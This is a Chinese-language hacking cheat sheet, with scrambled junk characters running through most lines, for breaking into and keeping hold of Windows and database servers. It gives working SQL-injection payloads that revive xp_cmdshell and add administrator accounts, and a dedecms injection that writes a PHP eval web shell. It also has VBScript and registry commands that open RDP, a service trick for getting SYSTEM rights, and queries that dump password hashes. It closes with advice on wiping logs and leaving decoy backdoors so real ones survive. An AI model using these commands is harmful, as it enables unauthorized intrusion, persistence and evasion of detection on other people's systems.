% ^: i' r. d1 Q. l' y8 U, I# g: I f: c
1.net user administrator /passwordreq:no2 l! S0 w' M; r% l$ g1 C1 ]
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了6 Q; N0 a; y6 \8 v( A/ |' v9 b
2.比较巧妙的建克隆号的步骤2 T0 v8 M$ \1 t! W3 @6 ]
先建一个user的用户
8 T' U3 ~- a0 x+ c, F' }& j然后导出注册表。然后在计算机管理里删掉! B, s, T: P' _/ q ?. W3 Z4 }, y: t
在导入,在添加为管理员组
. O3 J+ C% O2 a" x5 y3.查radmin密码2 B; Z! E: U" m2 p
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg" B2 L1 J5 t- w8 K) T) i+ z& m* s
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]0 {" ]& a1 f: {& S: b
建立一个"services.exe"的项
: n8 s" U/ B$ a9 ~; `再在其下面建立(字符串值)
2 ?* G5 B4 W% U) l9 e( n键值为mu ma的全路径
/ l: U( j8 x, w( E. N( Q5.runas /user:guest cmd
9 ?* [ g1 b3 J, T1 D i测试用户权限!7 d+ R* z; Y5 v* E) y
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?" b+ ^1 ]3 k0 T7 e, m' d9 `5 E
7.入侵后漏洞修补、痕迹清理,后门置放:
" S0 H |. L, b9 e基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
* s& Z: v) V7 m/ `* x, W8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
: O5 v0 m' f/ y# a
$ ~. _; g o- C9 D5 u0 u5 W% F t; ?for example
, I+ o; h+ X: W& A3 a" e# E" i6 ^. ~2 Y8 j
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
+ n9 Y- j3 Z. L# ], \; E
/ z% k9 t! n8 K' _' ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
+ q; H) }! J/ j* Y3 P% E: L2 d7 F6 \9 d; H9 F
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
5 B+ l% Z9 Q+ U8 o# v& n如果要启用的话就必须把他加到高级用户模式, n0 q) P2 Z2 k
可以直接在注入点那里直接注入
7 Q# M4 F |6 {3 ?id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--4 {2 M1 B9 w( n8 c3 V9 H
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
$ t/ ^' D/ t2 _% V: x8 c4 K# i5 V或者
# c9 I$ T; i2 A- psp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'0 v' l* Y/ H/ w3 K3 e
来恢复cmdshell。7 ^2 @# w+ G: e6 R. h
' T1 Q. w* u7 ^5 }5 w分析器% B; ?& v, C( B( T/ |
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
# P+ ~& F8 W3 @. X; W6 _9 a然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll") p6 \; R! p7 Q6 n$ ~. O
10.xp_cmdshell新的恢复办法
6 Q, o1 N1 o7 ~! p6 G9 g0 f. @" [xp_cmdshell新的恢复办法5 J+ A3 s2 z, |
扩展储存过程被删除以后可以有很简单的办法恢复:: `; f& v/ b' [# z
删除
! r2 J/ }" k& @6 w! bdrop procedure sp_addextendedproc& o/ S. K4 O0 l& y3 k
drop procedure sp_oacreate
2 K$ U7 D& U3 r: `$ Z5 Kexec sp_dropextendedproc 'xp_cmdshell'
( s$ S6 {0 j, B6 T5 g
6 `1 h+ t6 o2 y! E( A4 s恢复
: w: G g, C! \) jdbcc addextendedproc ("sp_oacreate","odsole70.dll")9 a: E- r) e/ A
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
# ~) b D$ C9 b
( v$ w/ K3 v. \, u% ?8 g6 j这样可以直接恢复,不用去管sp_addextendedproc是不是存在. U# J0 U' k: k) a* Z1 j
3 \4 w: H* \: X. V7 v& I-----------------------------
' }. \7 Y. m/ r0 h8 q" n1 }( n5 N1 ~5 J! s1 ?+ B
删除扩展存储过过程xp_cmdshell的语句:
# d& r& ^, F# b" n3 e2 B0 F. s! Y- Nexec sp_dropextendedproc 'xp_cmdshell' {6 u$ R( S' R
% o; A2 D }1 | `0 _. c& N1 m
恢复cmdshell的sql语句
* }# m1 i" J: w" L. t texec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'$ z O# W1 W6 E( o; P
s% Z5 B- e/ X# {& C( \! q
5 y$ L- l( J4 q$ ^% p
开启cmdshell的sql语句2 k# t/ u4 F3 s' z
3 X: H* A8 s( Eexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
4 ]0 a0 N. z3 n$ d: T$ z- ?8 @! A: V3 ~; b. l; U
判断存储扩展是否存在
b6 p$ d: w* U ]% yselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
- c/ T* N# b4 R4 l9 K返回结果为1就ok
: a C+ E) `' |! [# q0 j- O6 j9 c m8 Y- M w
恢复xp_cmdshell% ^0 Q& o6 v' C- |* `& u$ Y% G
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'9 k$ H' E! D( t: H
返回结果为1就ok
- H% \9 o2 J0 p( H) k5 {7 E {. R3 P, e* t* n0 u! P% x
否则上传xplog7.0.dll* h& Z8 a# }5 Q
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
/ d9 @; e( h" H6 T: [
2 K6 K# S! j! M堵上cmdshell的sql语句8 S- ^' N/ w- D- d) _7 h# Z+ ~: V
sp_dropextendedproc "xp_cmdshel g) b4 G0 p) r S6 f
------------------------- K- `& [* y9 ?: A5 U5 U& E2 @
清除3389的登录记录用一条系统自带的命令:1 K* H/ t1 ]; H A8 D% L; ?
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f$ a- ^$ }8 V y6 K5 E7 z
9 N; o- a6 R. ^: h0 x
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件. l; @* S- b4 Z" X8 o) S3 h9 |
在 mysql里查看当前用户的权限
$ @! s- @& W1 h8 R# `show grants for
7 b+ y$ b: h: n, N( [
, J; F- S9 Y6 d" O5 T以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
! G7 `% G7 ^3 o0 g9 ?
# P" M* B; k8 J' P1 ^
$ D" j! J: H. f; v) dCreate USER 'itpro'@'%' IDENTIFIED BY '123';
9 `6 f% [% A' S1 s, {) D4 F8 T7 i# y7 O4 `* M4 t4 a/ {
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION# B5 e9 Y' O2 M* r) b6 C6 B: O
; \2 y4 V& j0 z8 k/ t
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
* V5 O% h8 ^% q7 [8 Q4 c. I- M% }8 H0 y M' y# w
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;+ Z! F1 W* X) o* u- P6 s
. {0 m. Y6 T! B% x
搞完事记得删除脚印哟。( p: l0 x) ^1 C4 A* A* V
0 B/ Q2 n* j2 Q* n2 X2 f5 P( yDrop USER 'itpro'@'%';
4 ^/ h# C% k/ P
4 K/ F, Y2 f' j7 w# r; B- R, t. ODrop DATABASE IF EXISTS `itpro` ;% T) ^1 P* y' D2 E* `: o* h
& P7 u ^- c! i+ [* Q当前用户获取system权限
. E( n" _" D" Y7 |" wsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
/ ~- a: j9 [+ B% U. g( q( Bsc start SuperCMD# D$ t8 Z' @( ]/ G& P5 ^4 A" _
程序代码1 l( _2 Y' }/ Q; i
<SCRIPT LANGUAGE="VBScript">
$ `4 Z& }6 `. Rset wsnetwork=CreateObject("WSCRIPT.NETWORK")0 |# w8 E- Z% n8 T( P3 C% t
os="WinNT://"&wsnetwork.ComputerName# X2 t4 @5 S( P4 j/ }& a5 n S
Set ob=GetObject(os)
+ V& b+ ^' Z2 }8 `0 |Set oe=GetObject(os&"/Administrators,group")& }8 |: y6 T* q3 s: w, r
Set od=ob.Create("user","nosec")
0 r1 _- O4 L5 V/ L; r# p0 nod.SetPassword "123456abc!@#"
2 C/ g2 V* ^* p5 y( r. N1 W1 uod.SetInfo
7 r; T$ }) W4 pSet of=GetObject(os&"/nosec",user)+ S) h: P0 C8 }. t* U2 N
oe.add os&"/nosec", D$ r! p0 x0 Y. G9 x8 N
</Script>' I7 l4 |4 H! `) u1 i: Z- N- Q, `4 A
<script language=javascript>window.close();</script>
+ Z3 S( v" U6 C. O1 n8 |7 n. c- E9 D2 Y3 Q$ A1 m& V) y
! h9 R6 W: z$ K$ H
5 {* e1 Z) C2 a7 m
9 k' U& Z. G1 `+ W* N) k; C K突破验证码限制入后台拿shell
/ E O, R: @$ @* I+ a6 K0 U, M) `5 A程序代码
P' m" U: g- zREGEDIT4 , Q S1 ^1 z0 _
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 9 }* b' ~* ]8 ?/ f q- _6 \1 I: ?
"BlockXBM"=dword:000000004 k! F, h5 K( D$ \
/ @' A3 W6 k% s) g3 `' G1 D- o }9 [
保存为code.reg,导入注册表,重器IE
. S; v& X! r+ I& T5 q: g1 e) s就可以了
+ p1 V7 b& Y) k/ ]. d! tunion写马
! V5 {" e/ W* s/ n! M* X程序代码$ @" M8 |; T2 b- g8 h( L
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
& S i3 Z! ~$ D5 {* t+ G
6 f' W; V. c7 z8 s/ `+ M. o2 s F应用在dedecms注射漏洞上,无后台写马
7 K) E7 F0 D# i9 e4 G$ Ededecms后台,无文件管理器,没有outfile权限的时候
: z: k0 C C# C ?; A- B6 ]在插件管理-病毒扫描里
- y( o" w4 L: |& p$ h+ ]# A写一句话进include/config_hand.php里
& Y, {1 |6 Q8 b% D" p3 @; U程序代码
: W% I' {% [: ~- p>';?><?php @eval($_POST[cmd]);?>
2 V7 a& y! J; t( E ~ {
- I9 ^9 y6 [% J- H' ?
/ E1 v8 Y6 ^# d" a" K7 s: k如上格式! l1 k. j! Z7 B1 k9 N* T: x2 U
" H/ \( ~- S0 f1 ?" u
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解- ]8 G `$ z! E5 o
程序代码
# z8 M! F& K1 C; Q$ d! x) b% hselect username,password from dba_users;$ G/ y8 y. e3 X3 F9 d) A9 N/ r
9 r6 B( A( K2 m8 K1 o- A6 Y6 R5 u8 O5 f6 U) A U
mysql远程连接用户! S& `( ], P1 N$ v4 n) `1 U
程序代码
( y0 g/ v/ {3 C6 h6 a, E0 l! m' \2 P: _- P: k
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';# E$ i& g9 v0 {6 g9 N8 m+ R
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
% T- v6 y/ e, A3 x+ SMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0/ i2 C7 n* d* r
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
& I7 u* Y1 }0 b6 @$ l8 A) z3 d5 C! a$ E$ W/ `( U
/ c3 J# L* ^! s8 [0 L0 \+ _1 r: \. C, J M& |- y
7 g8 H, m. ` {( \4 Qecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0( I. C, O# F- X3 t0 O3 O1 b/ E
: H; a: O- h% n0 y! P- _5 u1.查询终端端口
" j8 y5 @/ Q) f# x& u q1 a7 n( o
$ J# o# }1 s2 ^6 m4 G) Lxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber0 D6 L) R) C4 R6 z2 J" f
6 i$ d- \ z; E通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"$ a5 ]( c& D9 E% x8 i) P
type tsp.reg: \ ?: P4 t! J: S0 x2 k c' |' G
4 a' `, N3 u7 Q% H0 X2.开启XP&2003终端服务& @! B6 p' Q7 f$ m) c" k
! \9 W- [* Q6 I, ^7 ]) I
4 t( a2 B4 ~" I+ A" X- ~
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f' ?, j" e$ p7 U* |+ A @
9 W/ ]$ K. f' P( L
$ J# T& r$ p& {+ Z3 \& \REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f. m5 @; _1 R7 Y0 @
8 | Q1 `3 |; c% S% ?4 E
3.更改终端端口为20008(0x4E28)% B+ z) Z, B4 Y1 Y! Y0 k
& E& l6 X4 i8 o E9 V0 _REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f7 \. p% n2 K9 U5 \
/ e, r% o& Z7 X' ZREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f4 F( \$ Y" {+ H
6 ?. F% c4 t5 _# R! R( f/ y/ y, U4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
3 g* F g; W9 A
7 k. F( i) a) r' |/ d' HREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f: Q: w4 t/ F2 y( C
. g4 Q( o* ~5 C [
: s4 C0 _1 l2 H8 X: A8 v5.开启Win2000的终端,端口为3389(需重启)
6 z4 B' | ]8 u+ A+ Y# Q. p
& R3 h j$ I# F# w P7 _% necho Windows Registry Editor Version 5.00 >2000.reg
; Q4 l) g: y( F; f8 G g8 r/ R; Fecho. >>2000.reg* _9 ?! E" _% d$ a% L2 t7 w5 Z1 u5 y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
; b8 R. D; R2 ]; @& k4 O0 T! kecho "Enabled"="0" >>2000.reg
$ {& {+ @* G" O& Q- r# q+ I- z& y& @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
9 {' r2 V5 ~- ]% h. jecho "ShutdownWithoutLogon"="0" >>2000.reg
9 |* j& D3 I+ N- @, P! _+ Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
+ W! e: z- Z* z n9 m' F) recho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 3 i; X* D& P! f- R, ^. [1 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
- {, R6 k0 f3 R# v- Kecho "TSEnabled"=dword:00000001 >>2000.reg
+ j9 s3 A, ^: s( X" y& hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 3 Y% H/ u! H6 w2 H; {8 ], t
echo "Start"=dword:00000002 >>2000.reg ) v9 d/ b$ u* q) l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
2 C8 R7 G8 J6 r7 A5 _5 {. }$ R% W# gecho "Start"=dword:00000002 >>2000.reg
$ P- e" J# @; `0 L* Q# {$ Becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
3 k6 g$ Z- M3 ?6 J3 o. \) q6 U6 vecho "Hotkey"="1" >>2000.reg , b6 r( H7 y3 a; y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg # T) l; e% c2 ^+ y
echo "ortNumber"=dword:00000D3D >>2000.reg # e/ [ D+ C9 r8 _$ Y6 k& o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
3 b" y V! J5 u% P" Fecho "ortNumber"=dword:00000D3D >>2000.reg
1 G D6 L* S' n. ?& R8 v
7 Z- \0 E- q( V! P J& m y6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
$ S4 K7 }' F8 j8 x8 J% O: y
0 v# u' H1 E9 r@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
- l( M: G6 b, S g6 k(set inf=InstallHinfSection DefaultInstall)( j, ]6 `9 T) |9 j
echo signature=$chicago$ >> restart.inf+ _/ h, A T, w: S
echo [defaultinstall] >> restart.inf
6 b3 H" e# @. a# brundll32 setupapi,%inf% 1 %temp%\restart.inf
0 e' G, N) P$ U; C- b. a& k% G% B) B" r
3 M o& {4 W- B5 ^4 E9 O7.禁用TCP/IP端口筛选 (需重启)8 v/ |; c5 f0 M5 a% e) H# `& V
1 q/ g' e7 g9 h- z8 G ]" A" j
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
; L! v d7 l @/ Q) ~# v% `* B/ K5 v2 z$ p* e
8.终端超出最大连接数时可用下面的命令来连接2 q, X5 F. J5 y2 j5 f; x, ?8 K
; Y, Z/ [& D9 P! ]5 N( n) e9 K1 `0 zmstsc /v:ip:3389 /console
+ f# o- Y/ M3 S" Y. N0 B4 k: ~7 v$ Y5 C. H- A) I: G: M: h
9.调整NTFS分区权限) U, n! A% S9 b" Q: B- n& W
# Y t" ]" n0 o, M3 x M
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
/ N8 t. p$ h. f) J- C
/ M& F# ~# t |0 \cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)5 U% W. R; Z/ I& e1 M) K; Y
T9 b* a( E1 K) N0 X3 a* e2 k------------------------------------------------------
& m/ a" u( V; _9 ~2 X3389.vbs . U' i& I! ?8 a5 q# d
On Error Resume Next
+ W7 | L! `$ Q9 a" Jconst HKEY_LOCAL_MACHINE = &H80000002$ p' ]4 d O% t8 o5 L6 {7 F' t
strComputer = "."
8 y! W0 f2 H0 tSet StdOut = WScript.StdOut
' k# b2 o- y6 K7 ISet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_& j: q" Z) \% {& c2 m
strComputer & "\root\default:StdRegProv")' h& }9 q0 _ N7 i- C' P
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server") j7 z$ t$ K) E0 y1 [5 S2 ~' \/ `
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath- Y3 m; U5 k( O/ _. ?7 z8 r! U
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"- N0 ]' s3 t* X
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath+ y3 j: |' `9 l% V8 q$ l
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
1 [2 @- H/ B+ |' c7 ?) ustrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) i2 | r6 n' `strValueName = "fDenyTSConnections"
, p% A! b0 O, O: c7 T! pdwValue = 0% ]9 c7 i- }* a( {" n: k$ w0 G
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" o ~. I0 Q! Q( @strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"$ O5 f% l/ [) F
strValueName = "ortNumber"
7 F9 O# h* u: ?4 t9 |8 [7 cdwValue = 3389; ^; D6 D! S9 }" ?' H, j4 L. |5 l
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue+ c& `1 A1 P3 a
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
0 ?4 P6 }* u- C e/ YstrValueName = "ortNumber"- J, c. b2 ^0 d- n6 P9 G
dwValue = 3389
- ^, D9 B4 Q8 _: }- C" A% uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue: ?+ j/ k: L5 I5 \
Set R = CreateObject("WScript.Shell") , ]9 ~0 O& H9 k! I) j
R.run("Shutdown.exe -f -r -t 0") 3 u1 e$ ^. A9 `
0 H1 [7 ?2 F0 `; X5 i3 z删除awgina.dll的注册表键值2 p* H# d1 e+ h5 Z
程序代码3 Q' U) u6 Y9 ~+ F6 ?9 t
4 }/ I, C% Z- q' U6 U: Y. oreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
M b2 F/ D0 g" o+ b0 u0 J+ q& h
1 J' _% x$ Q, ~, C
: W8 J( M' C( B0 q; B0 [4 C- {, K s% k- ~
& v) Y. k1 Z3 H3 Z程序代码
1 h) f5 C7 g) R1 b# l0 G% \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash9 h7 H1 I) d" J& d% [4 T A$ o" ~
+ S, E8 B0 i8 Z g: @& v2 F* W) `
设置为1,关闭LM Hash
$ l# |2 r* o7 ^9 h( b1 B: A4 {% Z5 x, ^/ a2 `& g
数据库安全:入侵Oracle数据库常用操作命令/ h# K* P9 U1 W# ]: x# ~2 g$ x
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。+ G4 H. K) R3 O
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
% x* m& k z; G- b" M1 j2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; v( ]1 O Y; M7 R+ Y1 q
3、SQL>connect / as sysdba ;(as sysoper)或
* l8 }* C5 Z8 k$ b+ M* b. U5 v8 [( E4 Q- tconnect internal/oracle AS SYSDBA ;(scott/tiger)9 b: y) P; E3 D |
conn sys/change_on_install as sysdba;+ Z# ?, L! Z0 m" Q3 s# \
4、SQL>startup; 启动数据库实例
/ C" }* a8 K! Q5、查看当前的所有数据库: select * from v$database;
7 Y r7 } k* C* \1 i' |! ]/ dselect name from v$database; B: ?1 t5 L$ l2 u: M( T+ ?4 ? C \ j
6、desc v$databases; 查看数据库结构字段
! H- m# L: @6 o! d B P7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:& c, ^1 `5 b2 s) I
SQL>select * from V_$PWFILE_USERS;& W; v0 p* M/ _" V1 A7 }
Show user;查看当前数据库连接用户
3 _$ x% E* k3 M! s! p8、进入test数据库:database test;
0 {9 S" y0 Q& s9 E7 K4 B; |9、查看所有的数据库实例:select * from v$instance;
' |# r9 L4 p" o: v) [如:ora9i* O q7 Z1 F# s
10、查看当前库的所有数据表:. P2 x7 c% K+ _, t' A
SQL> select TABLE_NAME from all_tables;
4 d/ A8 h6 `" W7 O, a Jselect * from all_tables;
4 y1 d" o1 v# T/ d+ R1 rSQL> select table_name from all_tables where table_name like '%u%';: ]; R* w' ]& L! S2 f+ R2 f$ G
TABLE_NAME' Z: T. p) e" c2 G2 H
------------------------------# C$ w: d6 p# p; I; K! `* K
_default_auditing_options_
5 k% `) t0 o8 A" o/ Y3 K. n11、查看表结构:desc all_tables;( }6 o' y; m& s8 R: O
12、显示CQI.T_BBS_XUSER的所有字段结构:6 u$ i+ y, ^* R+ t% p
desc CQI.T_BBS_XUSER;
6 q, }0 S y8 a Q13、获得CQI.T_BBS_XUSER表中的记录:# W7 h8 w9 F0 ~ I- C) S
select * from CQI.T_BBS_XUSER;* Z3 s6 q3 W5 v8 l7 n! {
14、增加数据库用户:(test11/test)8 R4 V- F+ w; @6 b2 \8 u; u1 t
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
2 O' D; b2 S2 S1 ~7 p9 z15、用户授权:# T+ V, ~) V0 g2 m( Y" j' @
grant connect,resource,dba to test11;
3 Y5 E, T( E. X8 V! d' f0 Jgrant sysdba to test11;
5 S( k* F/ b# k3 zcommit;3 [& W3 ]5 q9 x/ U0 V
16、更改数据库用户的密码:(将sys与system的密码改为test.)
u z" H) W# E% ]: X- Q7 Z. kalter user sys indentified by test;
5 C" u' m6 V7 v( m8 F9 l' jalter user system indentified by test;: Q3 L& a, }& _. w2 L) ]: |4 j2 _
, P" ^! m# |- |7 l& g N" s
applicationContext-util.xml
9 z+ r& j+ q! f3 b9 F! yapplicationContext.xml
8 k$ `$ b4 z- }3 f+ z8 Estruts-config.xml, A4 E; E3 Q( O& l, U& n n/ {
web.xml
y% @# e/ o/ g4 j# Y! d) zserver.xml
+ ^) m6 @$ n! w. m8 \tomcat-users.xml; g6 d/ d: H9 z1 X0 M0 [! c, r2 y
hibernate.cfg.xml1 i* U l8 ?; @, Y+ z
database_pool_config.xml
- f+ s) ^5 w6 H+ p6 u, S! s. b# w
" [; E4 z# s$ C' h8 z2 ~% v0 j! f* X5 w; v' t" w. W7 z% }- T
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置* K6 j2 D6 G, ~* g# N2 U1 l
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini9 h/ D& p/ t: r3 L' g. l! R! w
\WEB-INF\struts-config.xml 文件目录结构
# |7 F$ e h( _' H- `7 A
. O1 U9 J2 e; x4 l3 V& X: Vspring.properties 里边包含hibernate.cfg.xml的名称/ H% Y/ g, E7 J" k
. N4 @$ {$ i# F( a4 A. i2 i" w- T+ `% `0 k3 U0 V1 s A+ _
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml0 m2 ^- n% U/ T5 C/ V* h, C# c
8 X: v1 z0 D( Q7 E7 }1 K# _7 R$ k: {如果都找不到 那就看看class文件吧。。) o a( l8 o% T) S7 |
2 p# t1 I9 k3 y: G测试1:4 \5 D1 {! x @
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
! y) D2 ?* K5 n6 Q
4 A4 @. N5 \7 L( \: |+ i, G: {6 [测试2:
' U) _9 v5 u# {# K0 j2 u
% x& O3 d# J& n4 _create table dirs(paths varchar(100),paths1 varchar(100), id int)
2 n: d6 d% h% K3 s! W/ ^0 A! j0 ^% [3 Y$ d
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! h6 u1 u' G% G+ F
, r" o2 t0 t: ~" \6 YSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1- H/ G) E- F0 U# f0 c+ B
( d' w' [+ s2 Y; G. r, y. T2 s查看虚拟机中的共享文件:
! l3 }- a' }- a: _, d* L在虚拟机中的cmd中执行
, }/ r( Y! Z6 T* R4 r& r5 G\\.host\Shared Folders
4 b3 r# S3 j, t6 x1 A6 F/ ]
( y2 j' r/ c. g7 Z+ Ycmdshell下找终端的技巧6 ~" T; h' q/ `/ l+ U! D
找终端: / G! a) i# H- a$ `% }( U, u7 a
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
% ? j/ v4 Q( L! v* a1 L 而终端所对应的服务名为:TermService
/ ?* @7 b7 l1 R& _* |第二步:用netstat -ano命令,列出所有端口对应的PID值!
$ q9 v' B* B. d; M. a0 ] 找到PID值所对应的端口
8 M' w- }' b+ e' ]& C. r0 `
. |( K! K2 [! W6 Y" u查询sql server 2005中的密码hash
$ D3 {" Y2 @9 K) jSELECT password_hash FROM sys.sql_logins where name='sa'3 \7 F" G C! W, m! L. @
